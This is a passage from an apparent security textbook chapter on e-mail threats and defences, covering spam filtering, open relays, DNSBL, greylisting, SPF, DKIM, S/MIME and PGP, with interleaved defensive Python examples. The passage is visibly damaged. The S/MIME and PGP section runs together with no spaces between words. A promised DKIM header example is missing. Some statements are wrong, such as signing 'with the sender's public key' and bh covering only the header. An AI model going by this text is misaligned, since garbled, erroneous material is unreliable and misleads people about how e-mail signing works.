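FAKE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 12 + b"\xff\xd9"


def build_message() -> bytes:
    """Compose an HTML e-mail with a JPEG attachment and serialize it to wire format."""
    msg = EmailMessage()
    msg["From"] = "alice@example.com"        # example.com is reserved for documentation
    msg["To"] = "bob@example.com"
    msg["Subject"] = "Quarterly figures"
    msg.set_content("<p>See attached.</p>", subtype="html")
    # add_attachment converts the message to multipart/mixed and, for binary
    # data, selects Content-Transfer-Encoding: base64.
    msg.add_attachment(FAKE_JPEG, maintype="image", subtype="jpeg", filename="chart.jpg")
    return msg.as_bytes(policy=policy.SMTP)   # CRLF line endings, as sent over SMTP


def inspect_message(raw: bytes) -> dict:
    """Parse wire-format bytes as an MDA/MUA would and summarize the MIME structure."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    summary = {
        "content_type": msg.get_content_type(),   # multipart/mixed
        "boundary": msg.get_boundary(),           # separator named in the Content-Type header
        "parts": [],
        "attachment_intact": False,
    }
    for part in msg.iter_parts():
        summary["parts"].append(
            (part.get_content_type(), part.get("Content-Transfer-Encoding"), part.get_filename())
        )
        if part.get_filename() == "chart.jpg":
            # get_content() reverses the Base64 transfer encoding for us.
            summary["attachment_intact"] = part.get_content() == FAKE_JPEG
    return summary


def attachment_is_ascii(raw: bytes) -> bool:
    """True when the whole message, attachment included, is 7-bit ASCII on the wire."""
    return all(b < 128 for b in raw)


def attachment_base64_on_wire(raw: bytes) -> bool:
    """True when the Base64 text of the attachment appears verbatim in the message."""
    return base64.b64encode(FAKE_JPEG) in raw


if __name__ == "__main__":
    wire = build_message()
    print(wire.decode("ascii"))
    print(inspect_message(wire))
```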
Security of E-Mail

E-mail can be used to move a variety of threats across the network. From spam, to viruses, to advanced malware in spear-phishing attacks, e-mail can act as a transmission medium. Spam is the most common attack but is now just a nuisance; the majority is now mostly cleaned up by mail server filters and software. The e-mail hoax has become another regular occurrence; Internet-based urban legends are spread through e-mail, with users forwarding them in seemingly endless loops around the globe. And, of course, people still haven't found a good way to block ubiquitous spam e-mails (a sampling of which is shown in Figure 16.2), despite the remarkable advance of every other technology.

Figure 16.2 A typical list of spam e-mails

E-mail security is ultimately the responsibility of users themselves, because they are the ones who will actually be sending and receiving the messages. However, security administrators can give users the tools they need to fight malware, spam, and hoaxes. Secure/Multipurpose Internet Mail Extensions (S/MIME) and Pretty Good Privacy (PGP) are two popular methods used for encrypting e-mail, as discussed later in the chapter. Server-based and desktop-based virus protection can help against malicious code, and spam filters attempt to block all unsolicited commercial e-mail. E-mail users need to be educated about security as well, however, because the popularity and functionality of e-mail is only going to increase with time.

Instant messaging (IM), while not part of the e-mail system, is similar to e-mail in many respects, particularly in the sense that it is commonly plaintext and can transmit files. IM's handling of files opens the application to virus exploitation just like e-mail. IM has experienced a boom in popularity in the last few years, so we will look at some popular IM programs later in this chapter, such as AOL Instant Messenger, shown in Figure 16.3.

Figure 16.3 AOL Instant Messenger is a popular instant messaging program.

Malicious Code

Viruses and worms are popular programs because they make themselves popular. When viruses were constrained to only one computer, they attempted to spread by attaching themselves to every executable program that they could find. This worked out very well for the viruses, because they could piggyback onto a floppy disk with a program that was being transferred to another computer. The virus would then infect the next computer, and the next computer after that. While often successful, virus propagation was slow, and floppies could be scanned for viruses.

Exam Tip: Viruses and worms both can carry malicious payloads and cause damage. The difference is in how they are transmitted: viruses require a file to infect, whereas worms can exist independently of a file.

The advent of computer networks was a computer virus writer's dream, allowing viruses to attempt to infect every network share to which the computer was attached. This extended the virus's reach from a set of machines that might share a floppy disk to every machine on the network. Because the e-mail protocol permits users to attach files to e-mail messages (see Figure 16.4), viruses can travel by e-mail from one local network to another, anywhere on the Internet. This changed the nature of virus programs, since they once were localized but now could spread virtually everywhere. E-mail gave the virus a global reach.

Figure 16.4 Viruses commonly spread through e-mail attachments.

When active content was designed for the Web, in the form of Java and ActiveX scripts, these scripts were interpreted and run by the web browser. E-mail programs also would run these scripts, and that's when the trouble began. Some e-mail programs, most notably Microsoft Outlook, use a preview pane, which allows users to read e-mails without opening them in the full screen (see Figure 16.5).

Figure 16.5 The preview pane on the right can execute code in e-mails without opening them.

Tech Tip: HTML e-mail
HTML e-mail can carry embedded instructions to download or run scripts that can be launched from the preview pane in some e-mail programs, without requiring that the user actively launch the attached program.

Unfortunately, this preview still activates all the content in the e-mail message, and because Outlook supports Visual Basic scripting, it is vulnerable to e-mail worms. A user doesn't need to run the program or even open the e-mail to activate the worm; simply previewing the e-mail in the preview pane can launch the malicious content. This form of automatic execution was the primary reason for the spread of the ILOVEYOU worm.

Tech Tip: E-Mail Hygiene
All e-mail should be scanned for malware, spam, and other unwanted items before it truly enters the e-mail system in an organization. This reduces risk and also reduces the costs of backup. With spam comprising the majority of received e-mails, not having to back it up saves a lot of space.

All malware is a security threat, with the several different types having different countermeasures. The antivirus systems that we have used for years have progressed to try to stop all forms of malicious software, but they are not a panacea. Worm prevention also relies on patch management of the operating system and applications. Viruses are user-launched, and since one of the most common transfer methods for viruses is through e-mail, the people using the e-mail system create the front line of defense against viruses. In addition to antivirus scanning of the user's system, and possibly an e-mail virus filter, users need to be educated about the dangers of viruses. Although the great majority of users are now aware of viruses and the damage they can cause, more education may be needed to instruct them on the specific things that need to be addressed when a virus is received via e-mail. These can vary from organization to organization and from e-mail software to e-mail software; however, some useful examples of good practices involve examining all e-mails for a known source as well as a known destination, especially if the e-mails have attachments. Strange files or unexpected attachments should always be checked with an antivirus program before execution. Users also need to know that some viruses can be executed simply by opening the e-mail or viewing it in the preview pane. Education and proper administration are also useful in configuring the e-mail software to be as virus resistant as possible; turning off scripting support and the preview pane are good examples. Many organizations outline specific user responsibilities for e-mail, similar to network acceptable use policies. Some examples include using e-mail resources responsibly, avoiding the installation of untrusted programs, and using localized antivirus scanning programs, such as AVG.

Another protection is to carefully create virus-scanning procedures. If possible, perform virus scans on every e-mail as it comes into the company's e-mail server. This is actually the one place that spam may prove useful. The explosion in spam mail has driven the adoption of e-mail filtering gateways designed to greatly reduce spam messages. These specialized e-mail servers have evolved to attempt to protect against virus threats as well as spam. Some users will also attempt to retrieve e-mail offsite from a normal ISP account, which can bypass the server-based virus protection, so every machine should also be protected with a host-based virus protection program that scans all files on a regular basis and performs checks of files upon their execution. While these steps will not eliminate the security risks of malicious code in e-mail, they will limit infection and help to keep the problem to manageable levels.

Hoax E-Mails

E-mail hoaxes are mostly a nuisance, but they do cost everyone, not only in the time wasted by receiving and reading the e-mails, but also in the Internet bandwidth and server processing time they take up. E-mail hoaxes are global urban legends, perpetually traveling from one e-mail account to the next, and most have a common theme of some story you must tell ten other people about right away for good luck or some virus that will harm your friends unless you tell them immediately. Hoaxes are similar to chain letters, but instead of promising a reward, the story in the e-mail is typically what produces the action.

Forwarding hoax e-mails and other jokes, funny movies, and non-work-related e-mails at work can be a violation of your company's acceptable use policy and result in disciplinary actions.

Hoaxes have been circling the Internet for many years, and many websites are dedicated to debunking them, such as Snopes.com (see Figure 16.6).

Figure 16.6 Snopes is an online reference for urban legends common in hoax e-mails.

The most important thing to do in this case is educate e-mail users: they should be familiar with a hoax or two before they go online, and they should know how to search the Internet for hoax information. Users need to apply the same common sense on the Internet that they would in real life: If it sounds too outlandish to be true, it probably is a fabrication. The goal of education about hoaxes should be to change user behavior to delete the hoax e-mail and not send it on.

Unsolicited Commercial E-Mail (Spam)

Every e-mail user has received spam, and usually does on a daily basis. Spam refers to unsolicited commercial e-mail whose purpose is the same as the junk mail you get in your physical mailbox—it tries to persuade you to buy something. The term spam comes from a skit on Monty Python's Flying Circus, where two people are in a restaurant that serves only the potted meat product. This concept of the repetition of unwanted things is the key to e-mail spam.

Exam Tip: Unsolicited commercial e-mail is referred to as spam.

The first spam e-mail was sent in 1978 by a DEC employee. However, the first spam that really captured everyone's attention was in 1994, when two lawyers posted a commercial message to every Usenet newsgroup. This was the origin of using the Internet to send one message to as many recipients as possible via an automated program. Commercial e-mail programs have taken over, resulting in the variety of spam that most users receive in their in-boxes every day. Botnet researchers have reported that a million-plus infected machines send more than 100 billion spam e-mails every day. According to the Symantec monthly State of Spam report in July 2009, over 90 percent of e-mail sent worldwide is spam.

The appeal to the people generating the spam is the extremely low cost per advertising impression. The senders of spam e-mail can generally send the messages for less than a cent apiece. This is much less expensive than more traditional direct mail or print advertisements, and this low cost will ensure the continued growth of spam e-mail unless something is done about it. The amount of spam being transmitted eventually spurred federal authorities into action. In late 2003 the Controlling the Assault of Non-Solicited Pornography and Marketing Act (CAN-SPAM) was signed into law. This law gave the Federal Trade Commission (FTC) authority to define the standards of spam e-mail and enforce the other provisions of the act. While several spammers have been caught and prosecuted under this act, it has not been restrictive enough to severely limit spam. This has forced most people to seek out technical solutions to the spam problem.

Tech Tip: Controlling Port 25 on Mail Servers
SMTP authentication forces the users who use your server to obtain permission to send mail by first supplying a username and password. This helps to prevent open relay and abuse of your server and is highly recommended when your mail server has a routed IP address. This ensures that only known accounts can use your server's SMTP to send e-mail. The number of connections to an SMTP server should be limited based on the specifications of the server hardware (memory, NIC bandwidth, CPU, etc.) and its nominal load per day. Limiting connections is useful to mitigate spam floods and DoS attacks that target your network infrastructure.

The front line of the war against spam e-mail is filtering. Almost all e-mail providers filter spam at some level; however, bandwidth is still used to send the spam, and the recipient e-mail server still has to process the message. To reduce spam, it must be fought on several fronts. The first thing to do is educate users about spam. A good way for users to fight spam is to be cautious about where on the Internet they post their e-mail address. However, you can't keep e-mail addresses secret just to avoid spam. One of the steps that the majority of system administrators running Internet e-mail servers have taken to reduce spam, and which is also a good e-mail security principle, is to shut down mail relaying. Port scanning occurs across all hosts all the time, typically with a single host scanning large subnets for a single port, and some of these people could be attempting to send spam e-mail. When they scan for TCP port 25, they are looking for SMTP servers, and once they find a host that is an open relay (a mail server that will accept mail from anyone), they can use that host to send as many commercial e-mails as possible. The reason that they look for an open relay is that spammers typically do not want the e-mails traced back to them. Mail relaying is similar to dropping a letter off at a post office instead of letting the postal carrier pick it up at your mailbox. On the Internet, that consists of sending e-mail from a separate IP address, making it more difficult for the mail to be traced back to you. SMTP server software is typically configured to accept mail only from specific hosts or domains. All SMTP software can and should be configured to accept only mail from known hosts, or to known mailboxes; this closes down mail relaying and helps to reduce spam.

Tech Tip: Open Relays
Configure mail relay options carefully to avoid being an open relay. All mail servers have an option where you can specify which domains or IP addresses your mail server will relay mail for. It's very important to configure your mail relay parameter to be very restrictive so that your server does not become a gateway for spamming others, possibly resulting in your server getting blacklisted.

Since it may not be possible to close all mail relays, and because some spammers will mail from their own mail servers, software must be used to combat spam at the recipient's end. Spam can be filtered at two places: at the host itself or at the server. Filtering spam at the host level is done by the e-mail client software and usually employs basic pattern matching, focusing on the sender, subject, or text of the e-mail. This fairly effective system uses an inordinate amount of bandwidth and processing power on the host computer, however. These problems can be solved by filtering spam at the mail server level. Many companies offer a dedicated appliance designed as a specialty e-mail server with the primary task of filtering spam. This server typically uses a combination of the techniques listed here. It also implements an internal database to allow more granular filtering based upon spam the appliance has already seen.

Try This! Testing Your Mail Server for Open Relay
Make note of your e-mail server settings, and then try to send regular SMTP mail when you are on a different network, such as the Wi-Fi network at a coffee shop or other similar open access Internet connection. You should get an error refusing relaying. If the mail goes through, that server might have a misconfiguration.

Tech Tip: DNSBL Reference
The DNSBL process is detailed more thoroughly at www.dnsbl.com.

The server-based approach can be beneficial because other methods of filtering spam can be used at the server: pattern matching is still used, but SMTP software can also use a process called Domain Name Service (DNS) blacklisting, or DNSBL. The Real-time Blackhole List (RBL) was the first list to utilize the concept of using DNS records to filter, or "blackhole," spam-sending IP addresses and domains. Started in 1997, this list was and is maintained in real time specifically for blocking spam e-mail. While the RBL was the first DNSBL, there are now many blackhole lists. The DNSBL service is so popular that many programs, such as sendmail, Postfix, and Eudora Internet Mail Server, include support for it by default. In addition to the RBL, multiple other DNS-based blacklist services can assist filtering based upon DNS sources of mail. Commercial packages can block spam at the server level using both methods mentioned, maintaining their own blacklists and pattern-matching algorithms.

Many additional techniques exist for server-based spam filtering—enough to fill an entire book on the subject. One technique is to use a challenge/response system: once an e-mail is received by a "new" contact, a challenge is sent back to the originating address to confirm the contact. Since spammers send e-mails in bulk, the response mechanism is too cumbersome and they will not respond. Another technique is known as greylisting. When an e-mail is received, it is bounced as a temporary rejection. SMTP servers that are RFC 5321–compliant will wait a configurable amount of time and attempt retransmission of the message. Obviously, spammers will not retry sending of any messages, so spam is reduced.
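The DNSBL lookup and the greylisting technique described above, as one added example (not code from the book) that covers both: a receiving SMTP front end first checks the client IP against a DNS blacklist, then applies triplet greylisting and returns the SMTP reply code. The DNSBL zone, the IP addresses and the SMTP sessions are constructed sample data; a real server would query DNS instead of the lookup dict.

```python
"""Server-side spam controls: DNSBL lookup and greylisting (added example, not book code).

The DNSBL zone data and SMTP sessions below are constructed sample data; a real
server would resolve the query name over DNS instead of consulting a dict.
"""
import ipaddress
import time
from dataclasses import dataclass, field

# Constructed stand-in for a DNSBL zone. Real lists (such as the RBL discussed in
# the text) answer an A record for <reversed-ip>.<zone> when the IP is listed.
DNSBL_ZONE = "dnsbl.example"                       # .example is reserved for documentation
FAKE_DNS_A_RECORDS = {
    "4.3.2.203.dnsbl.example": "127.0.0.2",        # 203.2.3.4 is listed (constructed)
}


def dnsbl_query_name(ip: str, zone: str = DNSBL_ZONE) -> str:
    """Build the name a DNSBL client queries: octets reversed, then the list's zone."""
    addr = ipaddress.IPv4Address(ip)               # raises on anything that is not IPv4
    return ".".join(reversed(str(addr).split("."))) + "." + zone


def dnsbl_listed(ip: str, resolve=FAKE_DNS_A_RECORDS.get) -> bool:
    """True when the list answers with an A record (by convention inside 127.0.0.0/8)."""
    answer = resolve(dnsbl_query_name(ip))
    if answer is None:
        return False
    return ipaddress.IPv4Address(answer) in ipaddress.ip_network("127.0.0.0/8")


@dataclass
class Greylist:
    """Triplet greylisting keyed on (client IP, envelope sender, envelope recipient).

    First contact gets a 4xx temporary failure. An RFC 5321 compliant MTA retries
    after a delay; if the retry arrives at least `delay` seconds later and before
    the entry expires, the triplet is accepted from then on.
    """
    delay: int = 300              # seconds before a retry is honored
    expire: int = 4 * 3600        # forget a triplet that was never retried
    seen: dict = field(default_factory=dict)

    def decide(self, ip: str, sender: str, rcpt: str, now: float) -> str:
        key = (ip, sender.lower(), rcpt.lower())
        first = self.seen.get(key)
        if first is None or now - first > self.expire:
            self.seen[key] = now                  # start (or restart) the clock
            return "450 4.7.1 Greylisted, please try again later"
        if now - first < self.delay:
            return "450 4.7.1 Greylisted, please try again later"
        return "250 2.0.0 OK"


def smtp_frontend(sessions, greylist: Greylist, resolve=FAKE_DNS_A_RECORDS.get):
    """Apply the DNSBL first (cheap, rejects known bad sources), then greylisting.

    `sessions` is a list of (timestamp, client_ip, mail_from, rcpt_to) tuples.
    Returns the SMTP reply issued for each session, in order.
    """
    results = []
    for now, ip, sender, rcpt in sessions:
        if dnsbl_listed(ip, resolve):
            results.append("554 5.7.1 Client host blocked by DNSBL")
            continue
        results.append(greylist.decide(ip, sender, rcpt, now))
    return results


if __name__ == "__main__":
    t0 = time.time()
    sample = [   # constructed sessions
        (t0, "203.2.3.4", "spammer@bad.example", "bob@example.com"),          # listed IP
        (t0, "198.51.100.7", "alice@example.net", "bob@example.com"),         # first contact
        (t0 + 60, "198.51.100.7", "alice@example.net", "bob@example.com"),    # retried too early
        (t0 + 600, "198.51.100.7", "alice@example.net", "bob@example.com"),   # retry accepted
    ]
    for reply in smtp_frontend(sample, Greylist()):
        print(reply)
```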
All these techniques have advantages and disadvantages, and most people will run some combination of techniques to attempt to filter as much spam as possible while not rejecting legitimate messages. A side benefit of filtering spam at the receiving server is reduced e-mail.

In enterprises, performing backups of information is a significant task. Backups are size dependent, both in cost and time, and reducing e-mail by eliminating spam can have significant impacts on e-mail backups. Spam reduction will also have a significant impact on the e-discovery process, as it reduces the quantity of material that needs to be searched. E-discovery is a term for electronic discovery, the electronic component of a legal discovery process. The discovery process is court mandated and, when applied to a corporate environment, can cause the shutdown of corporate operations until the process is complete. For this reason, anything that makes the process easier or faster will benefit the corporation.

Tech Tip: Activate Reverse DNS to Block Bogus Senders
Messaging systems use DNS lookups to verify the existence of e-mail domains before accepting a message. A reverse DNS lookup is an option for fighting off bogus mail senders, as it verifies the sender's address before accepting the e-mail. Reverse DNS lookup acts by having SMTP verify that the sender's IP address matches both the host and domain names that were submitted by the SMTP client in the EHLO/HELO command. This works by blocking messages that fail the address-matching test, suggesting that they did not come from where they say they came from.

Spam URI Real-time Block Lists

Spam URI Real-time Block Lists (SURBL) detect unwanted e-mail based on invalid or malicious links within a message. Using a SURBL filter is a valuable tool to protect users from malware and phishing attacks. Not all mail servers support SURBL, but this technology shows promise in the fight against malware and phishing.

Sender ID Framework

Microsoft offers another server-based solution to spam, called the Sender ID Framework (SIDF). SIDF attempts to authenticate messages by checking the sender's domain name against a list of IP addresses authorized to send e-mail by the domain name listed. This list is maintained in a text (TXT) record published by the DNS, called a Sender Policy Framework (SPF) record. So when a mail server receives an e-mail, it will check the sender's domain name in the DNS; if the outbound server's IP matches, the message gets a "pass" rating by SIDF. This is similar to the idea that routers should drop any outbound port 25 traffic that does not come from known e-mail servers on the subnet managed by the router. However, the SIDF system handles the authentication of the e-mail server when it is received, not when it is sent. This system still allows wasted bandwidth from the sender of the message to the receiver, and since bandwidth is increasingly a metered service, this means the cost of spam is still paid by the recipient. The SPF check ensures that the sending MTA is allowed to send mail on behalf of the sender's domain name. When SPF is activated on your server, the sending server's MX record (the DNS Mail Exchange record) is validated before message transmission takes place.

These methods can take care of up to 90 percent of the junk mail clogging our networks, but they cannot stop it entirely. Better control of port 25 traffic is required to slow the tide of spam hitting our in-boxes. This would stop spammers using remote open relays and, hopefully, prevent many users from running unauthorized e-mail servers of their own. Because of the low cost of generating spam, until serious action is taken, or spam is somehow made unprofitable, it will remain with us.
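The SPF check that Sender ID builds on, as an added example (not code from the book): a receiving MTA evaluates the connecting client's IP against the v=spf1 TXT record of the envelope sender's domain, walking the mechanisms left to right until one matches. This is plain SPF as defined in RFC 7208 rather than Sender ID's PRA variant; the DNS records, domains and IP addresses are constructed, DNS is replaced by lookup dicts so it runs offline, and the mx, ptr and exists mechanisms and the redirect modifier are left out.

```python
"""SPF evaluation as a receiving MTA performs it (added example, not code from the book).

Checks the connecting client's IP against the SPF TXT record of the envelope
sender's domain (RFC 7208). DNS is replaced by constructed lookup tables so the
example runs offline; all domains are reserved documentation names.
"""
import ipaddress

# Constructed DNS data: SPF TXT records keyed by domain, plus A records that the
# "a" mechanism resolves. These are not real records.
FAKE_TXT = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 a:mail.example.com include:_spf.example.net -all",
    "_spf.example.net": "v=spf1 ip4:198.51.100.25 ~all",
    "example.org": "v=spf1 +all",          # weak policy: authorizes any sender at all
}
FAKE_A = {"mail.example.com": ["203.0.113.10"]}

QUALIFIER_RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def get_spf_record(domain: str, txt=FAKE_TXT.get):
    """Return the domain's SPF mechanisms, or None when no v=spf1 record exists."""
    rec = txt(domain.lower())
    if rec is None or not rec.lower().startswith("v=spf1"):
        return None
    return rec.split()[1:]


def check_spf(client_ip: str, sender_domain: str, txt=FAKE_TXT.get, a=FAKE_A.get, depth=0) -> str:
    """Walk the mechanisms left to right; the first one that matches decides the result."""
    if depth > 10:                      # RFC 7208 caps DNS-querying mechanisms at 10
        return "permerror"
    terms = get_spf_record(sender_domain, txt)
    if terms is None:
        return "none"
    ip = ipaddress.ip_address(client_ip)

    for term in terms:
        qualifier = "+"                 # mechanisms default to "+" (pass) when unqualified
        if term[0] in QUALIFIER_RESULT:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()

        if name == "all":
            matched = True
        elif name == "ip4":
            matched = ip.version == 4 and ip in ipaddress.ip_network(arg, strict=False)
        elif name == "a":
            host = arg or sender_domain
            matched = any(ipaddress.ip_address(x) == ip for x in (a(host) or []))
        elif name == "include":
            # include matches only when the referenced domain's policy yields "pass"
            matched = check_spf(client_ip, arg, txt, a, depth + 1) == "pass"
        else:
            continue                    # mx, ptr, exists, modifiers: not modeled here

        if matched:
            return QUALIFIER_RESULT[qualifier]
    return "neutral"                    # nothing matched and no explicit "all"


if __name__ == "__main__":
    for ip, dom in [("192.0.2.55", "example.com"), ("198.51.100.25", "example.com"),
                    ("203.0.113.10", "example.com"), ("203.0.113.99", "example.com"),
                    ("203.0.113.99", "example.org")]:
        print(f"{ip:>15} claiming {dom}: {check_spf(ip, dom)}")
```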
DomainKeys Identified Mail

DomainKeys Identified Mail (DKIM) is an e-mail validation system employed to detect e-mail spoofing. DKIM operates by providing a mechanism to allow receiving MTAs to check that incoming mail is authorized and that the e-mail (including attachments) has not been modified during transport. It does this through a digital signature included with the message that can be validated by the recipient using the signer's public key published in the DNS. DKIM is the result of the merging of two previous methods, DomainKeys and Identified Internet Mail. DKIM is the basis for a series of IETF standards-track specifications and is used by AOL, Gmail, and Yahoo mail. Any mail from these organizations should carry a DKIM signature. The following is an example of the DKIM information that is in an e-mail header:

The two signatures, b and bh, are for the message itself, header and body, and the header only.
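An added example (not code from the book) of how a receiving MTA uses the DKIM-Signature tags to detect a modified message. In RFC 6376, bh= is the base64 SHA-256 of the canonicalized body and b= is the RSA signature over the canonicalized header fields named in h= (plus the DKIM-Signature header itself with b= emptied), so the b= value also covers bh=. Producing or checking b= needs a key pair and a crypto library, so this block stops at the data the signature protects: it computes and verifies bh=, and shows the relaxed header canonicalization that b= is computed over. The message and its DKIM-Signature header are constructed sample data, and the b= value is a placeholder, not a real signature.

```python
"""DKIM body hash (bh=) computation and verification (added example, not book code).

RFC 6376: bh= is base64(SHA-256(canonicalized body)); b= is the RSA signature
over the canonicalized headers listed in h=. The RSA step is out of scope here,
so this stops at the hash the signature protects, which is enough to show how a
receiver detects a body altered in transit. Sample data below is constructed.
"""
import base64
import hashlib
import re

# Constructed sample message with CRLF line endings, as on the wire. The b= value
# is a placeholder, not a real RSA signature; bh= is filled in by signed_message().
SAMPLE_MESSAGE = (
    b"DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=example.com;\r\n"
    b" s=sel2016; h=from:to:subject; bh=BH_PLACEHOLDER; b=SIGNATURE_PLACEHOLDER\r\n"
    b"From: Alice <alice@example.com>\r\n"
    b"To: Bob <bob@example.com>\r\n"
    b"Subject: Invoice\r\n"
    b"\r\n"
    b"Please pay invoice 1234 to the usual account.\r\n"
    b"\r\n"
    b"\r\n"
)


def split_message(raw: bytes):
    """Separate the header block from the body at the first empty line."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return head, body


def simple_body_canonicalize(body: bytes) -> bytes:
    """RFC 6376 'simple' body canonicalization: drop trailing empty lines, end with one CRLF."""
    while body.endswith(b"\r\n\r\n"):
        body = body[:-2]
    if not body.endswith(b"\r\n"):
        body += b"\r\n"
    return body


def body_hash(body: bytes) -> str:
    """The bh= value: base64(SHA-256(canonicalized body))."""
    digest = hashlib.sha256(simple_body_canonicalize(body)).digest()
    return base64.b64encode(digest).decode("ascii")


def parse_dkim_tags(header_block: bytes) -> dict:
    """Extract tag=value pairs from the (possibly folded) DKIM-Signature header."""
    unfolded = re.sub(rb"\r\n[ \t]+", b" ", header_block)
    for line in unfolded.split(b"\r\n"):
        if line.lower().startswith(b"dkim-signature:"):
            value = line.split(b":", 1)[1].decode("ascii")
            pairs = (t.partition("=") for t in value.split(";") if t.strip())
            return {k.strip(): v.strip().replace(" ", "") for k, _, v in pairs}
    return {}


def relaxed_header_canonicalize(header_block: bytes, names) -> bytes:
    """'relaxed' header canonicalization for the h= fields: the bytes that b= signs."""
    unfolded = re.sub(rb"\r\n[ \t]+", b" ", header_block)
    fields = {}
    for line in unfolded.split(b"\r\n"):
        name, _, value = line.partition(b":")
        fields.setdefault(name.strip().lower(), []).append(value)
    out = b""
    for n in names:
        vals = fields.get(n.encode("ascii").lower())
        if vals:                                   # duplicate fields are taken bottom-up
            v = re.sub(rb"[ \t]+", b" ", vals.pop()).strip()
            out += n.encode("ascii").lower() + b":" + v + b"\r\n"
    return out


def verify_body_hash(raw: bytes, expected_bh: str = "") -> bool:
    """A receiver's first check: does bh= match the body that actually arrived?"""
    head, body = split_message(raw)
    bh = expected_bh or parse_dkim_tags(head).get("bh", "")
    return body_hash(body) == bh


def signed_message(raw: bytes) -> bytes:
    """Fill in the bh= tag a signer would have computed for this body."""
    head, body = split_message(raw)
    return raw.replace(b"BH_PLACEHOLDER", body_hash(body).encode("ascii"))


if __name__ == "__main__":
    msg = signed_message(SAMPLE_MESSAGE)
    print("original body verifies:", verify_body_hash(msg))
    tampered = msg.replace(b"the usual account", b"account 99-1234")
    print("tampered body verifies:", verify_body_hash(tampered))
    print(relaxed_header_canonicalize(split_message(msg)[0], ["from", "to", "subject"]).decode())
```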
MailEncryptionThee-mailconcernsdiscussedsofarinthischapterareallglobalissuesinvolvingsecurity,bute-mailsuffersfromamoreimportantsecurityproblem—thelackofconfidentiality,or,asitissometimesreferredto,privacy.AswithmanyInternetapplications,e-mailhasalwaysbeenaplaintextprotocol.WhenmanypeoplefirstgotontotheInternet,theyheardastandardlectureaboutnotsendinganythingthroughe-mailthattheywouldn’twantpostedonapublicbulletinboard.Partofthereasonfor
thiswasthate-mailissentwiththecleartextofthemessageexposedtoanyonewhoissniffingthenetwork.Anyattackeratachokepointinthenetworkcouldreadalle-mailpassingthroughthatnetworksegment.Sometoolscanbeusedtosolvethisproblembyusingencryptionon
thee-mail’scontent.ThefirstmethodisS/MIMEandthesecondisPGP.
S/MIMESecure/MultipurposeInternetMailExtensions(S/MIME)isasecureimplementationoftheMIMEprotocolspecification.MIMEwascreatedtoallowInternete-mailtosupportnewandmorecreativefeatures.Theoriginale-mailRFCspecifiedonlytexte-mail,soanynontextdatahadtobehandledbyanewspecification—MIME.MIMEhandlesaudiofiles,images,applications,andmultiparte-mails.MIMEallowse-mailtohandlemultipletypesofcontentinamessage,includingfiletransfers.Everytimeyousendafileasane-mailattachment,youareusingMIME.S/MIMEtakesthiscontentandspecifiesaframeworkforencryptingthemessageasaMIMEattachment.
CrossCheckX.509CertificatesInChapter7youlearnedaboutX.509certificatestandards.Whyisitimportanttohaveastandardizedcertificateformat?
S/MIMEwasdevelopedbyRSADataSecurityandusestheX.509formatforcertificates.Thespecificationsupportsboth40-bitRC2and3DESforsymmetricencryption.Theprotocolcanaffectthemessageinoneoftwoways:thehostmailprogramcanencodethemessagewithS/MIME,ortheservercanactastheprocessingagent,encryptingallmessagesbetweenservers.Thehost-basedoperationstartswhentheuserclicksSend;themail
agentthenencodesthemessageusingthegeneratedsymmetrickey.Then
thesymmetrickeyisencodedwiththeremoteuser’spublickeyforconfidentialityorsignedwiththelocaluser’sprivatekeyforauthentication/nonrepudiation.Thisenablestheremoteusertodecodethesymmetrickeyandthendecrypttheactualcontentofthemessage.Ofcourse,allofthisishandledbytheuser’smailprogram,requiringtheusersimplytotelltheprogramtodecodethemessage.Ifthemessageissignedbythesender,itwillbesignedwiththesender’spublickey,guaranteeingthesourceofthemessage.Thereasonthatbothsymmetricandasymmetricencryptionareusedinthemailistoincreasethespeedofencryptionanddecryption.Asencryptionisbasedondifficultmathematicalproblems,ittakestimetoencryptanddecrypt.Tospeedthisup,themoredifficultprocess,asymmetricencryption,isusedonlytoencryptarelativelysmallamountofdata,thesymmetrickey.Thesymmetrickeyisthenusedtoencrypttherestofthemessage.TheS/MIMEprocessofencryptinge-mailsprovidesintegrity,privacy,
and,ifthemessageissigned,authentication.Severalpopulare-mailprogramssupportS/MIME,includingthepopularMicrosoftproductsOutlookandWindowsMail.TheybothmanageS/MIMEkeysandfunctionsthroughtheE-mailSecurityscreen,showninFigure16.7.ThisfigureshowsthedifferentsettingsthatcanbeusedtoencryptmessagesanduseX.509digitalcertificates.Thisallowsinteroperabilitywithwebcertificates,andtrustedauthoritiesareavailabletoissuethecertificates.Trustedauthoritiesareneededtoensurethesendersarewhotheyclaimtobe,animportantpartofauthentication.InWindowsMail,thewindowissimpler(seeFigure16.8),butthesamefunctionsofkeymanagementandsecuree-mailoperationareavailable.
•Figure16.7S/MIMEoptionsinOutlook
•Figure16.8S/MIMEoptionsinWindowsMail
CrossCheckSymmetricEncryptionInChapter5youlearnedaboutsymmetricencryption,includingRC2andthe3DESalgorithmssupportedbyS/MIME.WhatpartoftheCIAofsecuritydoessymmetricencryptionattempttoprovideinthisinstance?
WhileS/MIMEisagoodandversatileprotocolforsecuringe-mail,itsimplementationcanbeproblematic.S/MIMEallowstheusertoselectlow-strength(40-bit)encryption,whichmeansausercansendamessagethatisthoughttobesecurebutthatcanbemoreeasilydecodedthanmessagessentwith3DESencryption.Also,aswithanyprotocol,bugscanexistinthesoftwareitself.Justbecauseanapplicationisdesignedforsecuritydoesnotmeanthatit,itself,issecure.Despiteitspotentialflaws,however,S/MIMEisatremendousleapinsecurityoverregulare-mail.
PGPPrettyGoodPrivacy(PGP)implementse-mailsecurityinasimilarfashiontoS/MIME,butPGPusescompletelydifferentprotocols.Thebasicframeworkisthesame:Theusersendsthee-mail,andthemailagentappliesencryptionasspecifiedinthemailprogram’sprogramming.Thecontentisencryptedwiththegeneratedsymmetrickey,andthatkeyisencryptedwiththepublickeyoftherecipientofthee-mailforconfidentiality.Thesendercanalsochoosetosignthemailwithaprivatekey,allowingtherecipienttoauthenticatethesender.Currently,PGPsupportspublickeyinfrastructure(PKI)providedbymultiplevendors,includingX.509certificatesandLightweightDirectoryAccessProtocol(LDAP)keysourcessuchasMicrosoft’sActiveDirectory.InFigure16.9,youcanseehowPGPmanageskeyslocallyinitsown
